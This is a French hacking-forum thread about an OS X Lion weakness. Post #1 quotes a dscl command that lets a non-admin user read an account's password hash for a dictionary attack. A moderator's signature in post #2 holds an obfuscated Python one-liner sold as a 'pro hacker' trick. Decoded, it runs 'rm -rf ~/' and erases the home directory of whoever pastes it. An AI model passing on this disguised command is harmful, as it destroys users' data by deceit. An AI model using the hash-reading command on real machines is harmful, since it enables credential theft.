Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-09-2011 23:18:10

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

OSX Lion casser le mot de passe avec une simple attaque dico

Il est apparemment possible de casser le mot de passe d'un compte en étant loggué sur un compte non admin sur OSX Loin.

Le service d'annuaire n'étant pas protégé il est possible de faire apparaître le hash d'une simple ligne de commande.

dscl localhost -read /Search/Users/Toto (Toto = login bien sur)

Ballot quoi lol

Je vou laisse en découvrir plus sur le blog de korben.
Cracker un mot de passe OSX Lion

Owned le lion !!!

jz1owbqt.jpg

PS: Aucun chaton n'a été maltraité dans ce topic smile

[Source:] korben.info

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-09-2011 23:24:24

spawn
Modérateur

Re : OSX Lion casser le mot de passe avec une simple attaque dico

mmh.

C'est toujours un hash. On aura beau savoir comment il est fait, ce n'est pas bijectif. (CPGE powa ! )
Un canard haché menu un jour, même avec de la colle, il ne volera plus après.

Donc suffit de mettre un password hardcore.
C'est comme pour le WPA. On a une idée de la vitesse ?

(à propos de WPA, j'en ai marre que tous mes nouveaux collègues me demandent comment cracker du WAP -_-' )

Enfin.. Allez, bonne journée !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 20-09-2011 23:38:14

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : OSX Lion casser le mot de passe avec une simple attaque dico

Oui j'ai pensé comme toi au début, mais l'expérience me rend moins catégorique que toi.

Quand tu regardes la très très très grande majorité des utilisateurs lambdas c'est déjà un miracle en soi qu'il y ait un mot de passe.

Et quand mot de passe il y a, tu n'as pas, très souvent à chercher bien loin.
Il est très rarement costaud, car les gens, ça les enm.... de devoir le rentrer à chaque fois.
Alors la plus part du temps ils font simple.

Après pour les paranos comme moi c'est clair, ce genre de truc ne sert à rien wink.

Pis c'était aussi l'occase de mettre un chaton dans mon post, j'adore ces petites bêtes lol

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce